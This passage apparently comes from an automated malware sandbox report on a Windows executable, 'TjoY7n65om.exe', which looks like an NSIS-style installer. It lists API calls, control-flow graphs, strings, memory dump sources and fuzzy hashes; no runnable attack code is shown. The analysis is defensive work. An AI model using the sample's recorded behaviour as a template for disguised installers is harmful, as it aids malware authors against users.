                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                                                          • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                                                                                                          • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                                                                                          • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,774D3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,774D3420), ref: 004065D2
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID: 8gB
                                                                                                                          • API String ID: 2295610775-1733800166
                                                                                                                          • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                                          • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                                                                          • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                                          • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\depersonaliseredes, xrefs: 004021C3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInstance
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\depersonaliseredes
                                                                                                                          • API String ID: 542301482-2693056274
                                                                                                                          • Opcode ID: 5cba2042925f0a607390c6eace5ead972fd1e42bd24b6c44ab96890c65fe79be
                                                                                                                          • Instruction ID: 81793f1010fc2e559759275c5502ec42cf4e228633e8d7c3619733a9a8aee0f9
                                                                                                                          • Opcode Fuzzy Hash: 5cba2042925f0a607390c6eace5ead972fd1e42bd24b6c44ab96890c65fe79be
                                                                                                                          • Instruction Fuzzy Hash: 34414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1974802433-0
                                                                                                                          • Opcode ID: 83698e80e24e563e54c4a8404194c01640705265cde1cffeb308655126ebb9a5
                                                                                                                          • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
                                                                                                                          • Opcode Fuzzy Hash: 83698e80e24e563e54c4a8404194c01640705265cde1cffeb308655126ebb9a5
                                                                                                                          • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 190 403d22-403d34 191 403e75-403e84 190->191 192 403d3a-403d40 190->192 193 403ed3-403ee8 191->193 194 403e86-403ece GetDlgItem * 2 call 4041fb SetClassLongW call 40140b 191->194 192->191 195 403d46-403d4f 192->195 197 403f28-403f2d call 404247 193->197 198 403eea-403eed 193->198 194->193 199 403d51-403d5e SetWindowPos 195->199 200 403d64-403d67 195->200 212 403f32-403f4d 197->212 204 403f20-403f22 198->204 205 403eef-403efa call 401389 198->205 199->200 201 403d81-403d87 200->201 202 403d69-403d7b ShowWindow 200->202 207 403da3-403da6 201->207 208 403d89-403d9e DestroyWindow 201->208 202->201 204->197 211 4041c8 204->211 205->204 227 403efc-403f1b SendMessageW 205->227 216 403da8-403db4 SetWindowLongW 207->216 217 403db9-403dbf 207->217 213 4041a5-4041ab 208->213 215 4041ca-4041d1 211->215 219 403f56-403f5c 212->219 220 403f4f-403f51 call 40140b 212->220 213->211 222 4041ad-4041b3 213->222 216->215 225 403e62-403e70 call 404262 217->225 226 403dc5-403dd6 GetDlgItem 217->226 223 403f62-403f6d 219->223 224 404186-40419f DestroyWindow EndDialog 219->224 220->219 222->211 228 4041b5-4041be ShowWindow 222->228 223->224 229 403f73-403fc0 call 4062a6 call 4041fb * 3 GetDlgItem 223->229 224->213 225->215 230 403df5-403df8 226->230 231 403dd8-403def SendMessageW IsWindowEnabled 226->231 227->215 228->211 260 403fc2-403fc7 229->260 261 403fca-404006 ShowWindow KiUserCallbackDispatcher call 40421d EnableWindow 229->261 234 403dfa-403dfb 230->234 235 403dfd-403e00 230->235 231->211 231->230 238 403e2b-403e30 call 4041d4 234->238 239 403e02-403e08 235->239 240 403e0e-403e13 235->240 238->225 243 403e49-403e5c SendMessageW 239->243 244 403e0a-403e0c 239->244 240->243 245 403e15-403e1b 240->245 243->225 244->238 246 403e32-403e3b call 40140b 245->246 247 403e1d-403e23 call 40140b 245->247 246->225 257 403e3d-403e47 246->257 256 403e29 247->256 256->238 257->256 260->261 264 404008-404009 261->264 265 40400b 261->265 266 40400d-40403b GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050 266->267 268 40403d-40404e SendMessageW 266->268 269 404056-404095 call 404230 call 403d03 call 406284 lstrlenW call 4062a6 SetWindowTextW call 401389 267->269 268->269 269->212 280 40409b-40409d 269->280 280->212 281 4040a3-4040a7 280->281 282 4040c6-4040da DestroyWindow 281->282 283 4040a9-4040af 281->283 282->213 285 4040e0-40410d CreateDialogParamW 282->285 283->211 284 4040b5-4040bb 283->284 284->212 286 4040c1 284->286 285->213 287 404113-40416a call 4041fb GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 40416c-40417f ShowWindow call 404247 287->292 294 404184 292->294 294->213
                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                                                                          • ShowWindow.USER32(?), ref: 00403D7B
                                                                                                                          • DestroyWindow.USER32 ref: 00403D8F
                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                                                                          • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                                                                          • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                          • String ID: 6B
                                                                                                                          • API String ID: 3282139019-4127139157
                                                                                                                          • Opcode ID: 61e46f2e5d4e30b8d331e99b2e62090d3ddcc4212222171d7de82e9bf3d87482
                                                                                                                          • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                                                                          • Opcode Fuzzy Hash: 61e46f2e5d4e30b8d331e99b2e62090d3ddcc4212222171d7de82e9bf3d87482
                                                                                                                          • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 295 403974-40398c call 40665e 298 4039a0-4039d7 call 406152 295->298 299 40398e-40399e call 4061cb 295->299 303 4039d9-4039ea call 406152 298->303 304 4039ef-4039f5 lstrcatW 298->304 307 4039fa-403a23 call 403c4a call 405c61 299->307 303->304 304->307 313 403ab5-403abd call 405c61 307->313 314 403a29-403a2e 307->314 320 403acb-403af0 LoadImageW 313->320 321 403abf-403ac6 call 4062a6 313->321 314->313 315 403a34-403a5c call 406152 314->315 315->313 324 403a5e-403a62 315->324 322 403b71-403b79 call 40140b 320->322 323 403af2-403b22 RegisterClassW 320->323 321->320 337 403b83-403b8e call 403c4a 322->337 338 403b7b-403b7e 322->338 326 403c40 323->326 327 403b28-403b6c SystemParametersInfoW CreateWindowExW 323->327 329 403a74-403a80 lstrlenW 324->329 330 403a64-403a71 call 405b86 324->330 335 403c42-403c49 326->335 327->322 331 403a82-403a90 lstrcmpiW 329->331 332 403aa8-403ab0 call 405b59 call 406284 329->332 330->329 331->332 336 403a92-403a9c GetFileAttributesW 331->336 332->313 341 403aa2-403aa3 call 405ba5 336->341 342 403a9e-403aa0 336->342 348 403b94-403bae ShowWindow call 4065ee 337->348 349 403c17-403c18 call 4053bf 337->349 338->335 341->332 342->332 342->341 356 403bb0-403bb5 call 4065ee 348->356 357 403bba-403bcc GetClassInfoW 348->357 352 403c1d-403c1f 349->352 354 403c21-403c27 352->354 355 403c39-403c3b call 40140b 352->355 354->338 358 403c2d-403c34 call 40140b 354->358 355->326 356->357 361 403be4-403c07 DialogBoxParamW call 40140b 357->361 362 403bce-403bde GetClassInfoW RegisterClassW 357->362 358->338 365 403c0c-403c15 call 4038c4 361->365 362->361 365->335
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                            • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                          • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,774D3420,"C:\Users\user\Desktop\TjoY7n65om.exe",00000000), ref: 004039F5
                                                                                                                          • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\depersonaliseredes,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\depersonaliseredes,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                                                                          • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A93
                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\depersonaliseredes), ref: 00403ADC
                                                                                                                            • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                                                          • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                                                                          • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: "C:\Users\user\Desktop\TjoY7n65om.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\depersonaliseredes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                                                                          • API String ID: 1975747703-222409113
                                                                                                                          • Opcode ID: 8587381b39fd61b124eaa29958d8087b8bcb74e0bb8df45c1207c7271d45e6f8
                                                                                                                          • Instruction ID: 9910424c6ca31f4cc559053cc35dfc0eeb30f3212361bd75bc0ff30566f1833d
                                                                                                                          • Opcode Fuzzy Hash: 8587381b39fd61b124eaa29958d8087b8bcb74e0bb8df45c1207c7271d45e6f8
                                                                                                                          • Instruction Fuzzy Hash: C961B870244600BFE630AF269D46F273A6CEB44B49F40057EF985B62E2DB7D5911CA2D

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d7a 372 402f37-402f65 call 406284 call 405ba5 call 406284 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 4032fb 384->387 386->387 394 402f9a-402fa1 387->394 395 4030bc-4030c4 call 402e79 387->395 391 403067-40307f call 403311 call 4032fb 388->391 392 403089-4030b3 GlobalAlloc call 403311 call 403116 388->392 389->374 391->389 416 403081-403087 391->416 392->389 420 4030c6-4030d7 392->420 398 402fa3-402fb7 call 405d35 394->398 399 40301d-403021 394->399 395->389 407 40302b-403031 398->407 418 402fb9-402fc0 398->418 406 403023-40302a call 402e79 399->406 399->407 406->407 409 403040-40304a 407->409 410 403033-40303d call 406751 407->410 409->384 419 403050 409->419 410->409 416->389 416->392 418->407 422 402fc2-402fc9 418->422 419->381 423 4030d9 420->423 424 4030df-4030e4 420->424 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d35 426->428 427->407 429 402fdd-402ffd 427->429 431 40310d 428->431 429->389 432 403003-403007 429->432 431->374 433 403009-40300d 432->433 434 40300f-403017 432->434 433->419 433->434 434->407 435 403019-40301b 434->435 435->407
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                            • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                                            • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                          Strings
                                                                                                                          • Null, xrefs: 00402FD4
                                                                                                                          • "C:\Users\user\Desktop\TjoY7n65om.exe", xrefs: 00402EDD
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
                                                                                                                          • soft, xrefs: 00402FCB
                                                                                                                          • Inst, xrefs: 00402FC2
                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                          • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                                                                                                          • Error launching installer, xrefs: 00402F2D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                          • String ID: "C:\Users\user\Desktop\TjoY7n65om.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                          • API String ID: 4283519449-3354918095
                                                                                                                          • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                                          • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                                                                          • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                                          • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 436 4062a6-4062b1 437 4062b3-4062c2 436->437 438 4062c4-4062da 436->438 437->438 439 4062e0-4062ed 438->439 440 4064f2-4064f8 438->440 439->440 441 4062f3-4062fa 439->441 442 4064fe-406509 440->442 443 4062ff-40630c 440->443 441->440 445 406514-406515 442->445 446 40650b-40650f call 406284 442->446 443->442 444 406312-40631e 443->444 447 406324-406362 444->447 448 4064df 444->448 446->445 450 406482-406486 447->450 451 406368-406373 447->451 452 4064e1-4064eb 448->452 453 4064ed-4064f0 448->453 456 406488-40648e 450->456 457 4064b9-4064bd 450->457 454 406375-40637a 451->454 455 40638c 451->455 452->440 453->440 454->455 460 40637c-40637f 454->460 463 406393-40639a 455->463 461 406490-40649c call 4061cb 456->461 462 40649e-4064aa call 406284 456->462 458 4064cc-4064dd lstrlenW 457->458 459 4064bf-4064c7 call 4062a6 457->459 458->440 459->458 460->455 468 406381-406384 460->468 473 4064af-4064b5 461->473 462->473 464 40639c-40639e 463->464 465 40639f-4063a1 463->465 464->465 471 4063a3-4063c1 call 406152 465->471 472 4063dc-4063df 465->472 468->455 474 406386-40638a 468->474 479 4063c6-4063ca 471->479 477 4063e1-4063ed GetSystemDirectoryW 472->477 478 4063ef-4063f2 472->478 473->458 476 4064b7 473->476 474->463 480 40647a-406480 call 406518 476->480 481 406461-406465 477->481 482 4063f4-406402 GetWindowsDirectoryW 478->482 483 40645d-40645f 478->483 484 4063d0-4063d7 call 4062a6 479->484 485 40646a-40646d 479->485 480->458 481->480 487 406467 481->487 482->483 483->481 486 406404-40640e 483->486 484->481 485->480 490 40646f-406475 lstrcatW 485->490 492 406410-406413 486->492 493 406428-40643e SHGetSpecialFolderLocation 486->493 487->485 490->480 492->493 497 406415-40641c 492->497 494 406440-406457 SHGetPathFromIDListW CoTaskMemFree 493->494 495 406459 493->495 494->481 494->495 495->483 498 406424-406426 497->498 498->481 498->493
                                                                                                                          APIs
                                                                                                                          • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063E7
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,00405323,Completed,00000000), ref: 004063FA
                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Completed,?,00405323,Completed,00000000), ref: 00406436
                                                                                                                          • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 00406444
                                                                                                                          • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                                                                                                          • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                                                                          • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405323,Completed,00000000), ref: 004064CD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
